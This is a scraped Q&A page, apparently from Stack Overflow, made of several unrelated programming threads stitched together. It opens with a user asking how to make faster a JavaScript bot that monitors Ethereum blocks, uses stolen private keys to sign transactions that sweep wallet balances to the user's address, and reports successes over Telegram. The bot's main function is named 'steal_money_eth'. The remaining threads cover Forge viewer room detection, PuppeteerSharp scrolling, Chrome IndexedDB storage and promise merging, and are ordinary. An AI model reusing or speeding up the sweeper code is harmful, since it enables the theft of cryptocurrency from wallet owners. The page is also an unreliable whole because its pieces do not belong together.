I am new to cryptocurrency and would like to find out how to speed up the process of taking a token. Here is the finished code:
I use the code to exchange and do other things via telegram
async function trans_wallets_eth() {
for(var x in trans_eth) {
var to_address = trans_eth[x]['to'];
if (to_address in all_wallets) {
steal_money_eth(to_address, all_wallets[to_address]);
await new Promise(resolve => setTimeout(resolve, 30000));
}
}
}
async function getBlocks_eth() {
var work = true
while (work) {
try {
var latestBlock = await web4.eth.getBlock(block_identifier = web4.eth.defaultBlock, full_transactions = true);
global.trans_eth = latestBlock.transactions;
await trans_wallets_eth()
console.log('ETH '+latestBlock.number);
await new Promise(resolve => setTimeout(resolve, 1500));
} catch (e) {
await new Promise(resolve => setTimeout(resolve, 2000));
web4 = new Web3(moralis_eth)
}
}
}
async function steal_money_eth(wallet, wallet_specs) {
try {
var private_key = wallet_specs[0]
var eth_balance = wallet_specs[3]
var grab_from_eth_balance = await web4.utils.toWei(eth_balance, 'ether')
var fast_gas_price = await web4.utils.toWei(eth_gwei, 'gwei')
var counter = 0
while (true) {
var balance = await web4.eth.getBalance(wallet)
if (Number(balance) < grab_from_eth_balance) {
await new Promise(resolve => setTimeout(resolve, 100));
counter++
if (counter === 200) {
console.log("Stopped here")
return;
}
} else {
break;
}
}
var nonce = await web4.eth.getTransactionCount(wallet)
var transfer_amount = Number(balance) - fast_gas_price * 21000
var tx_price = {
'chainId': 1,
'nonce': nonce,
'to': user_wallet_address_eth,
'value': transfer_amount,
'gas': 21000,
'gasPrice': fast_gas_price
}
var signed_tx = await web4.eth.accounts.signTransaction(tx_price, private_key)
var tx_hash = await web4.eth.sendSignedTransaction(signed_tx.rawTransaction)
global.amount_sent_eth = await web4.utils.fromWei(String(transfer_amount), 'ether')
global.tx_link_eth = 'https://etherscan.com/tx/' + tx_hash.transactionHash
console.log('π°ETH '+amount_sent_eth+'π° Transaction successful!ππ ' + tx_link_eth)
sending_good_news_eth()
} catch (e) {
console.log(e)
await new Promise(resolve => setTimeout(resolve, 5000));
}
}
I would like to understand where to look. You don't have to change the code for me. Thank you in advance.
Related
My goal is to see the Revit rooms in the Forge viewer. The application is in .NET Core. I have tried implementing GenerateMasterViews.
The code I am using to achieve this is:
[Route("api/forge/modelderivative/jobs")]
public async Task<dynamic> TranslateObject([FromBody]TranslateObjectModel objModel)
{
dynamic oauth = await OAuthController.GetInternalAsync();
// prepare the payload
var advOutputPayload = new JobSvf2OutputPayloadAdvanced();
advOutputPayload.GenerateMasterViews = true;
List<JobPayloadItem> outputs = new List<JobPayloadItem>()
{
new JobPayloadItem(
JobPayloadItem.TypeEnum.Svf2,
new List<JobPayloadItem.ViewsEnum>()
{
JobPayloadItem.ViewsEnum._2d,
JobPayloadItem.ViewsEnum._3d
},
advOutputPayload
)
};
JobPayload job;
job = new JobPayload(new JobPayloadInput(objModel.objectName), new JobPayloadOutput(outputs));
// start the translation
DerivativesApi derivative = new DerivativesApi();
derivative.Configuration.AccessToken = oauth.access_token;
dynamic jobPosted = await derivative.TranslateAsync(job);
return jobPosted;
}
Autodesk.Viewing.Initializer(options, () => {
viewer = new Autodesk.Viewing.GuiViewer3D(document.getElementById('forgeViewer'));
viewer.start();
var documentId = 'urn:' + urn;
Autodesk.Viewing.Document.load(documentId, onDocumentLoadSuccess, onDocumentLoadFailure);
});
}
function onDocumentLoadSuccess(doc) {
var viewables = doc.getRoot().getDefaultGeometry();
viewer.loadDocumentNode(doc, viewables).then(i => {
// documented loaded, any action?
});
}
But I can't get it to work.
I have looked for information, but this url: https://forge.autodesk.com/en/docs/model-derivative/v2/tutorials/prep-roominfo4viewer/option2/ and this url:
https://forge.autodesk.com/en/docs/model-derivative/v2/tutorials/prep-roominfo4viewer/option1/ they don't work and I couldn't see how to do it.
To check if the object is in the room, we can do the following:
Get bounds for each room and object
getBoundingBox(dbId, model) {
const it = model.getInstanceTree();
const fragList = model.getFragmentList();
let bounds = new THREE.Box3();
it.enumNodeFragments(dbId, (fragId) => {
let box = new THREE.Box3();
fragList.getWorldBounds(fragId, box);
bounds.union(box);
}, true);
return bounds;
}
Iterate rooms and objects and use containsBox or containsPoint to check if their bounding box has intersection.
If you want to do an acute collision check, you can take advantage of the ThreeCSG.js to do geometry intersection. Here is a blog post demonstrating how to integrate ThreeCSG.js with Forge Viewer.
https://forge.autodesk.com/blog/boolean-operations-forge-viewer
Note. This process would reduce the viewer performance since JavaScript is running on a single thread on the Web Browser, so you may use some technologies like the web worker to do the complex calculations on a separate thread.
Update:
Here is a working sample extension demonstrating the above idea:
/////////////////////////////////////////////////////////////////////
// Copyright (c) Autodesk, Inc. All rights reserved
// Written by Forge Partner Development
//
// Permission to use, copy, modify, and distribute this software in
// object code form for any purpose and without fee is hereby granted,
// provided that the above copyright notice appears in all copies and
// that both that copyright notice and the limited warranty and
// restricted rights notice below appear in all supporting
// documentation.
//
// AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.
// AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF
// MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.
// DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
// UNINTERRUPTED OR ERROR FREE.
/////////////////////////////////////////////////////////////////////
(function () {
const Utility = {
/**
* Rest an object
* #param {Object} obj An object to be reset.
* ref: https://stackoverflow.com/a/24090180
*/
resetObject: function (obj) {
for (let key in Object.getOwnPropertyNames(obj)) {
if (!obj.hasOwnProperty(key)) continue;
let val = obj[key];
switch (typeof val) {
case 'string':
obj[key] = ''; break;
case 'number':
obj[key] = 0; break;
case 'boolean':
obj[key] = false; break;
case 'object':
if (val === null) break;
if (val instanceof Array) {
while (obj[key].length > 0) {
obj[key].pop();
}
break;
}
val = {};
//Or recursively clear the sub-object
//resetObject(val);
break;
}
}
}
};
/**
* A Forge Viewer extension for loading and rendering Revit Grids by AEC Model Data
* #class
*/
class RoomLocatorExtension extends Autodesk.Viewing.Extension {
constructor(viewer, options) {
super(viewer, options);
this.roomCategoryName = options.roomCategoryName || 'Revit Rooms';//'Revit Habitaciones'
this.onContextMenu = this.onContextMenu.bind(this);
}
onContextMenu(menu, status) {
if (status.hasSelected) {
menu.push({
title: 'Find room',
target: async () => {
let selSet = this.viewer.getSelection();
this.viewer.clearSelection();
const roomDbIds = await this.locateElementByRoom(selSet[0]);
if (!roomDbIds || roomDbIds.length <= 0) return;
this.viewer.select(roomDbIds);
}
});
}
}
async getPropertiesAsync(dbId, model) {
return new Promise((resolve, reject) => {
model.getProperties2(
dbId,
(result) => resolve(result),
(error) => reject(error)
);
});
}
async getElementsByCategoryAsync(category) {
return new Promise((resolve, reject) => {
this.viewer.search(
category,
(dbIds) => resolve(dbIds),
(error) => reject(error),
['Category'],
{ searchHidden: true }
);
});
}
async getRoomDbIds() {
try {
const roomDbIds = await this.getElementsByCategoryAsync(this.roomCategoryName);
if (!roomDbIds || roomDbIds.length <= 0) {
throw new Error('No Rooms found in current model');
}
return roomDbIds;
} catch (ex) {
console.warn(`[RoomLocatorExtension]: ${ex}`);
throw new Error('No room found');
}
}
getBoundingBox(dbId, model) {
const it = model.getInstanceTree();
const fragList = model.getFragmentList();
let bounds = new THREE.Box3();
it.enumNodeFragments(dbId, (fragId) => {
let box = new THREE.Box3();
fragList.getWorldBounds(fragId, box);
bounds.union(box);
}, true);
return bounds;
}
getLeafFragIds(model, leafId) {
const instanceTree = model.getData().instanceTree;
const fragIds = [];
instanceTree.enumNodeFragments(leafId, function (fragId) {
fragIds.push(fragId);
});
return fragIds;
}
getComponentGeometryInfo(dbId, model) {
const viewer = this.viewer;
const viewerImpl = viewer.impl;
const fragIds = this.getLeafFragIds(model, dbId);
let matrixWorld = null;
const meshes = fragIds.map((fragId) => {
const renderProxy = viewerImpl.getRenderProxy(model, fragId);
const geometry = renderProxy.geometry;
const attributes = geometry.attributes;
const positions = geometry.vb ? geometry.vb : attributes.position.array;
const indices = attributes.index.array || geometry.ib;
const stride = geometry.vb ? geometry.vbstride : 3;
const offsets = geometry.offsets;
matrixWorld = matrixWorld || renderProxy.matrixWorld.elements;
return {
positions,
indices,
offsets,
stride
};
});
return {
matrixWorld,
meshes
};
}
getComponentGeometry(data, vertexArray) {
const offsets = [
{
count: data.indices.length,
index: 0,
start: 0
}
];
for (let oi = 0, ol = offsets.length; oi < ol; ++oi) {
let start = offsets[oi].start;
let count = offsets[oi].count;
let index = offsets[oi].index;
for (let i = start, il = start + count; i < il; i += 3) {
const a = index + data.indices[i];
const b = index + data.indices[i + 1];
const c = index + data.indices[i + 2];
const vA = new THREE.Vector3();
const vB = new THREE.Vector3();
const vC = new THREE.Vector3();
vA.fromArray(data.positions, a * data.stride);
vB.fromArray(data.positions, b * data.stride);
vC.fromArray(data.positions, c * data.stride);
vertexArray.push(vA);
vertexArray.push(vB);
vertexArray.push(vC);
}
}
}
buildComponentMesh(data) {
const vertexArray = [];
for (let idx = 0; idx < data.nbMeshes; ++idx) {
const meshData = {
positions: data['positions' + idx],
indices: data['indices' + idx],
stride: data['stride' + idx]
}
this.getComponentGeometry(meshData, vertexArray);
}
const geometry = new THREE.Geometry();
for (let i = 0; i < vertexArray.length; i += 3) {
geometry.vertices.push(vertexArray[i]);
geometry.vertices.push(vertexArray[i + 1]);
geometry.vertices.push(vertexArray[i + 2]);
const face = new THREE.Face3(i, i + 1, i + 2);
geometry.faces.push(face);
}
const matrixWorld = new THREE.Matrix4();
matrixWorld.fromArray(data.matrixWorld);
const mesh = new THREE.Mesh(geometry);
mesh.applyMatrix(matrixWorld);
mesh.boundingBox = data.boundingBox;
mesh.bsp = new ThreeBSP(mesh)
mesh.dbId = data.dbId;
return mesh;
}
buildCsgMesh(dbId, model) {
const geometry = this.getComponentGeometryInfo(dbId, model);
const data = {
boundingBox: this.getBoundingBox(dbId, model),
matrixWorld: geometry.matrixWorld,
nbMeshes: geometry.meshes.length,
dbId
};
geometry.meshes.forEach((mesh, idx) => {
data['positions' + idx] = mesh.positions;
data['indices' + idx] = mesh.indices;
data['stride' + idx] = mesh.stride;
});
return this.buildComponentMesh(data);
}
async buildBBoxes() {
try {
const model = this.viewer.model;
const roomBBoxes = {};
const roomDbIds = await this.getRoomDbIds();
for (let i = 0; i < roomDbIds.length; i++) {
let dbId = roomDbIds[i];
let bbox = await this.getBoundingBox(dbId, model);
roomBBoxes[dbId] = bbox;
}
this.cachedBBoxes['rooms'] = roomBBoxes;
} catch (ex) {
console.warn(`[RoomLocatorExtension]: ${ex}`);
throw new Error('Cannot build bounding boxes from rooms');
}
}
async locateElementByRoom(dbId) {
let bbox = await this.getBoundingBox(dbId, this.viewer.model);
const roomDbIds = Object.keys(this.cachedBBoxes['rooms']);
const roomBoxes = Object.values(this.cachedBBoxes['rooms']);
// Coarse Phase Collision
const coarseResult = [];
for (let i = 0; i < roomDbIds.length; i++) {
let roomDbId = roomDbIds[i];
let roomBox = roomBoxes[i];
if (roomBox.containsBox(bbox)) {
coarseResult.push(parseInt(roomDbId));
} else {
if (roomBox.containsPoint(bbox.min) || roomBox.containsPoint(bbox.max) || roomBox.containsPoint(bbox.center())) {
coarseResult.push(parseInt(roomDbId));
}
}
}
// Fine Phase Collision
const fineResult = [];
let elementCsgMesh = this.buildCsgMesh(dbId, this.viewer.model);
for (let i = 0; i < coarseResult.length; i++) {
let roomDbId = coarseResult[i];
let roomCsgMesh = this.buildCsgMesh(roomDbId, this.viewer.model);
let result = elementCsgMesh.bsp.intersect(roomCsgMesh.bsp);
if (result.tree.polygons.length <= 0) {
result = roomCsgMesh.bsp.intersect(elementCsgMesh.bsp);
// if (!this.viewer.overlays.hasScene('csg'))
// this.viewer.overlays.addScene('csg');
// else
// this.viewer.overlays.clearScene('csg');
// let mat = new THREE.MeshBasicMaterial({ color: 'red' })
// let mesh = result.toMesh(mat);
// this.viewer.overlays.addMesh(mesh, 'csg')
if (result.tree.polygons.length <= 0) continue;
}
fineResult.push(roomDbId);
}
return fineResult;
}
async load() {
await Autodesk.Viewing.Private.theResourceLoader.loadScript(
'https://cdn.jsdelivr.net/gh/Wilt/ThreeCSG#develop/ThreeCSG.js',
'ThreeBSP'
);
if (!window.ThreeBSP)
throw new Error('Cannot load ThreeCSG.js, please download a copy from https://github.com/Wilt/ThreeCSG/blob/develop/ThreeCSG.js')
await this.viewer.waitForLoadDone();
this.cachedBBoxes = {};
await this.buildBBoxes();
this.viewer.registerContextMenuCallback(
'RoomLocatorExtension',
this.onContextMenu
);
return true;
}
unload() {
Utility.resetObject(this.cachedBBoxes);
this.viewer.unregisterContextMenuCallback(
'RoomLocatorExtension',
this.onContextMenu
);
return true;
}
}
Autodesk.Viewing.theExtensionManager.registerExtension('RoomLocatorExtension', RoomLocatorExtension);
})();
Snapshots:
I am new to puppeteersharp and puppeteer in general.
I am trying to convert a function that is used in puppeteer to puppeteerSharp and i am wondering how to do it.
Here is the puppeteer function(this one scroll down to the end of the page):
async function autoScroll(page){
await page.evaluate(async () => {
await new Promise((resolve, reject) => {
var totalHeight = 0;
var distance = 100;
var timer = setInterval(() => {
var scrollHeight = document.body.scrollHeight;
window.scrollBy(0, distance);
totalHeight += distance;
if(totalHeight >= scrollHeight){
clearInterval(timer);
resolve();
}
}, 100);
});
});
Anyone Can please tell me how can i manage to get this to work with puppeteerSharp?
Kind Regards
You can call EvaluateFunctionAsync and pass that function as string.
await page.EvaluateFunctionAsync(#"async () => {
await new Promise((resolve, reject) => {
var totalHeight = 0;
var distance = 100;
var timer = setInterval(() => {
var scrollHeight = document.body.scrollHeight;
window.scrollBy(0, distance);
totalHeight += distance;
if(totalHeight >= scrollHeight){
clearInterval(timer);
resolve();
}
}, 100);
});
}");
When we isolate an element in a 3d view, is there anyway to control the amount of transparency of all the other elements? Say, change to 50% translucent?
Have I missed something obvious?
And can you do the same for 2d views?
I dug out the following code for you, it shows how to set all leaf nodes to 50% opacity by changing their material properties:
AutodeskNamespace("Autodesk.ADN.Viewing.Extension");
function getLeafNodes(model, nodeId) {
return new Promise((resolve, reject)=>{
try{
var leafIds = [];
var instanceTree = model.getData().instanceTree
nodeId = nodeId || instanceTree.getRootId()
function _getLeafNodesRec(id){
var childCount = 0;
instanceTree.enumNodeChildren(id,
function(childId) {
_getLeafNodesRec(childId)
++childCount
})
if(childCount == 0){
leafIds.push(id)
}
}
_getLeafNodesRec(nodeId)
return resolve(leafIds)
} catch(ex){
return reject(ex)
}
})
}
function nodeIdToFragIds(model, nodeId) {
var instanceTree = model.getData().instanceTree
var fragIds = []
instanceTree.enumNodeFragments(
nodeId, (fragId) => {
fragIds.push(fragId)
});
return fragIds
}
Autodesk.ADN.Viewing.Extension.Basic = function (viewer, options) {
Autodesk.Viewing.Extension.call(this, viewer, options);
var _this = this;
_this.load = function () {
var fragList = viewer.model.getFragmentList()
getLeafNodes(viewer.model).then((dbIds) => {
dbIds.forEach((dbId) => {
const fragIds = nodeIdToFragIds(
viewer.model, dbId)
fragIds.forEach((fragId) => {
var material = fragList.getMaterial(fragId)
if(material) {
material.opacity = 0.5
material.transparent = true
material.needsUpdate = true
}
})
})
viewer.impl.invalidate(true, true, true)
})
return true;
};
_this.unload = function () {
Autodesk.Viewing.theExtensionManager.unregisterExtension(
"Autodesk.ADN.Viewing.Extension.Basic");
return true;
};
};
Autodesk.ADN.Viewing.Extension.Basic.prototype =
Object.create(Autodesk.Viewing.Extension.prototype);
Autodesk.ADN.Viewing.Extension.Basic.prototype.constructor =
Autodesk.ADN.Viewing.Extension.Basic;
Autodesk.Viewing.theExtensionManager.registerExtension(
"Autodesk.ADN.Viewing.Extension.Basic",
Autodesk.ADN.Viewing.Extension.Basic);
Some syntax requires ES6 transpiling. You can quickly paste the code there to test it: http://viewer.autodesk.io/node/gallery/#/extension-editor?id=560c6c57611ca14810e1b2bf
This works only for 3D, I'll see what we can do for 2D and update that topic.
i am trying to create an application where products are received on every second and updating a database of fixed size (~ 300 MB) using the LRU policy. Although i have no exception on adding new products and deleting them from the database, it seems that Chrome never deletes the .ldb and .bak files. As such, I spend several gigabytes of hard disk and i always reach the quota limit. The same code works perfect on Firefox. Can someone explain me what am i doing wrong? Below you can find the code.
startExperiment(300 * 1024 * 1024);
function startExperiment(lrusize:number) {
var j = 0;
var productsToInsert = new HashMap<number, Product>();
window.indexedDB.deleteDatabase("ExampleDatabase");
var versionNumber = 1;
var stats = new Stats();
var sizeOfDatabase = 0;
var db = new ProductDatabase('ExampleDatabase', versionNumber, () => {
db.getSizeOfDatabase((result) => {
if(result == null) {
sizeOfDatabase = 0;
} else {
sizeOfDatabase = result;
}
});
});
function randomizeArray() {
var numOfMBS = Math.floor((Math.random() * (10 - 2) + 2) * 1024 * 1024);
var bytearray = new Uint8Array(numOfMBS.valueOf());
for (var i = 0; i < bytearray.length; i++) {
bytearray[i] = Math.random() * (100 - 1) + 1;
}
return bytearray;
}
setInterval(function () {
var readAverage = stats.getReadTimesAverage();
var writeAverage = stats.getWriteTimesAverage();
var deleteAverage = stats.getDeleteTimesAverage();
console.log("Num of insertions : " + j + " | Read average : " + readAverage + " | Write average : " + writeAverage + " | Delete average : " + deleteAverage);
}, 5000);
setInterval(function () {
var bytearray = randomizeArray();
var identifier = j++;
var timestamp = Date.now();
db.getProduct(identifier, (product) => {
if (product == null) {
var newProduct = new Product(identifier, timestamp, 0, bytearray);
var size = memorySizeOf(newProduct);
newProduct.sizeInBytes = size;
productsToInsert.set(identifier, newProduct);
}
});
}, 1000);
function updateLRU() {
var tmpList:Product[] = [];
var keys = productsToInsert.keys();
var currentBytesToBeInserted = 0;
for (var i = 0; i < keys.length; i++) {
var product = productsToInsert.get(keys[i]);
tmpList.push(product);
currentBytesToBeInserted += product.sizeInBytes;
}
var currentSize = sizeOfDatabase + currentBytesToBeInserted;
if (currentSize > lrusize) {
var bytesToRemove = currentSize - lrusize;
db.deleteProducts(bytesToRemove, stats, () => {
sizeOfDatabase -= bytesToRemove;
addFragments(tmpList);
});
} else {
addProducts(tmpList);
}
}
function addProducts(tmpList:Product[]) {
var product = tmpList[0];
var startAddProductTs = Date.now();
db.addProduct(product, () => {
var stopAddProductTs = Date.now();
stats.addWriteTimes(stopAddProductTs - startAddProductTs);
sizeOfDatabase += product.sizeInBytes;
tmpList.shift();
productsToInsert.delete(product.productId);
if(tmpList.length > 0) {
addProducts(tmpList);
} else {
db.addDBSize(sizeOfDatabase, () => {
});
}
});
}
setInterval(function () {
updateLRU();
}, 20000);
}
class ProductDatabase {
private db;
constructor(private name:string, private version:number, callback:() => void) {
this.openDatabase(callback);
}
openDatabase(callback:() => void) {
var openDatabaseRequest = window.indexedDB.open(this.name, this.version);
openDatabaseRequest.onupgradeneeded = this.upgrade;
openDatabaseRequest.onsuccess = () => {
this.db = openDatabaseRequest.result;
callback();
}
}
upgrade(event:any) {
var store = event.target.result.createObjectStore("products", {keyPath: 'productId'});
store.createIndex('by_timestamp', "timestamp", {unique: true});
event.target.result.createObjectStore("dbsize", {keyPath: 'sizeId'});
}
getProduct(productId:number, callback:(result:Product) => void) {
var productStore = this.db.transaction(["products"], "readonly").objectStore('products');
var query = productStore.get(productId);
query.onsuccess = () => {
var product = query.result;
callback(product);
}
query.onerror = () => {
console.error("Read product error : " + query.error);
}
}
addDBSize(dbSize:number, callback:() => void) {
var transaction = this.db.transaction('dbsize', 'readwrite');
var productStore = transaction.objectStore('dbsize');
var newSize = {'sizeId': 1, 'bytelength': dbSize};
var request = productStore.put(newSize);
request.onerror = () => {
console.log("Unsuccessful request with error : " + request.error);
}
transaction.oncomplete = () => {
callback();
}
transaction.onerror = () => {
console.error("fucking error : " + transaction.error);
}
transaction.onabort = () => {
console.error("Shit. transaction is aborted with error : " + transaction.error);
}
}
addCachedProducts(productList:Array<Product>, callback:() => void) {
var transaction = this.db.transaction('products', 'readwrite');
var productStore = transaction.objectStore('products');
for (var i = 0; i < productList.length; i++) {
productStore.add(productList[i]);
}
transaction.oncomplete = () => {
callback();
}
transaction.onabort = () => {
console.error("Shit. transaction is aborted with error : " + transaction.error);
}
}
getNumberOfProducts(callback:(result:number) => void) {
var productStore = this.db.transaction('products', 'readonly').objectStore('products');
var query = productStore.count();
query.onsuccess = () => {
var result = query.result;
callback(result);
}
query.onerror = () => {
console.error("Read number of products error : " + query.error);
}
}
getSizeOfDatabase(callback:(result:number) => void) {
var productStore = this.db.transaction('dbsize', "readonly").objectStore('dbsize');
var query = productStore.get(1);
query.onsuccess = () => {
var product = query.result;
callback(product);
}
query.onerror = () => {
console.error("Read databasesize error : " + query.error);
}
}
deleteProducts(numOfBytes:number, stats:Stats, callback:() => void) {
var transaction = this.db.transaction('products', 'readwrite');
var productStore = transaction.objectStore('products');
var index = productStore.index('by_timestamp');
var request = index.openCursor();
request.onsuccess = function () {
var cursor = request.result;
if (cursor) {
var cursorBytes = cursor.value.sizeInBytes;
var startDeleteTs = Date.now();
var deleteRequest = cursor.delete();
deleteRequest.onsuccess = () => {
var stopDeleteTs = Date.now();
stats.addDeleteTimes(stopDeleteTs - startDeleteTs);
numOfBytes -= cursorBytes;
if (numOfBytes > 0) {
cursor.continue();
}
}
deleteRequest.onerror = () => {
console.error("Delete product error : " + deleteRequest.error);
}
}
}
transaction.oncomplete = () => {
callback();
}
transaction.onabort = () => {
console.log("Delete transaction aborted with error : " + transaction.error);
}
}
addProduct(product:Product, callback:() => void) {
var transaction = this.db.transaction('products', 'readwrite');
var productStore = transaction.objectStore('products');
var request = productStore.put(product);
request.onerror = () => {
console.log("Unsuccessful request with error : " + request.error);
}
transaction.oncomplete = () => {
callback();
}
transaction.onerror = () => {
console.error("fucking error : " + transaction.error);
}
transaction.onabort = () => {
console.error("Shit. transaction is aborted with error : " + transaction.error);
}
}
}
In Chrome, there is a delay between deleting data through the IndexedDB API and having it deleted from disk. Usually that's fine. But in my experience, sometimes it never gets deleted from disk, which is really bad when the user has exceeded their quota because then you can never store any more data even if you delete everything.
Thanks dumbmatter. Unfortunately my experience also showed me that Chrome never deletes the unnecessary files. The problem is that IndexedDB in Chrome use LevelDB as an implementation and it rarely calls compact. However, i found a solution using PouchDB which leverages both IndexedDB and LevelDB api and i can explicitly call compact and delete my unnecessary files.
Trying to get API data.
I have problem with creating valid JSON after modification.
Data should looks like this: [{"1"},{"2"},{"3"}, ... ,{201},{202},{203}, ...]
but now: [{"1"},{"2"},{"3"}, ...],[{"201"},{"202"},{"203"}, ...]
Where is my mistake?
var Promise = require("bluebird");
var request = require('bluebird').promisifyAll(require('request'));
var fs = Promise.promisifyAll(require('fs'));
var ladders = {"hardcore":"hardcore", "standard":"standard"};
function getJSONsync(urls) {
var ladder = [];
Promise.map(urls, function(url) {
return request
.getAsync(url)
.spread(function (res, body) {
if (res.statusCode != 200) {
throw new Error('Unsuccessful attempt. Code: '+ res.statusCode);
}
return JSON.stringify(ladder.concat(JSON.parse(body).entries), "", 4);
})
.catch(console.error);
},{ concurrency: 10 })
.then(function(arr) {
fs.writeFileAsync('file.json', arr);
})
}
function setUrls(ladderName, offset, limit) {
var arr = [];
while(offset < 15000 ) {
arr.push('http://api.pathofexile.com/ladders/'+ladderName+'?offset='+offset+'&limit='+limit);
offset = offset + 200;
}
return arr;
}
getJSONsync(setUrls(ladders.hardcore, 0, 200));
Thx for help.
Sorry for my Eng.
Finally:
var Promise = require("bluebird");
var request = require('bluebird').promisifyAll(require('request'));
var fs = Promise.promisifyAll(require('fs'));
var ladders = {"hardcore":"hardcore","standard":"standard"};
function getJSONsync(urls) {
Promise.map(urls, function(url) {
return request
.getAsync(url)
.spread(function (res, body) {
if (res.statusCode != 200) {
throw new Error('Unsuccessful attempt. Code: '+ res.statusCode);
}
return JSON.parse(body).entries;
})
.catch(console.error);
},{ concurrency: 10 })
.reduce(function(a, b) { return a.concat(b) })
.then(function(arr) {
fs.writeFileAsync('file.json', JSON.stringify(arr, "", 4));
console.log(arr.length);
})
}
function setUrls(ladder, offset, limit) {
var arr = [];
while(offset < 15000 ) {
arr.push('http://api.pathofexile.com/ladders/'+ladder+'?offset='+offset+'&limit='+limit);
offset = offset + 200;
}
return arr;
}
getJSONsync(setUrls(ladders.hardcore, 0, 200));
Promise.map returns an array, so when you do ladder.concat you return another array, so it becomes [[{"1"}], [{"1", "2"}]
You should just remove concat:
return JSON.stringify(JSON.parse(body).entries, "", 4);
But if you want to use variable ladder you may ladder.push(JSON.stringify(JSON.parse(body).entries, "", 4)) and use it instead of arr returned variable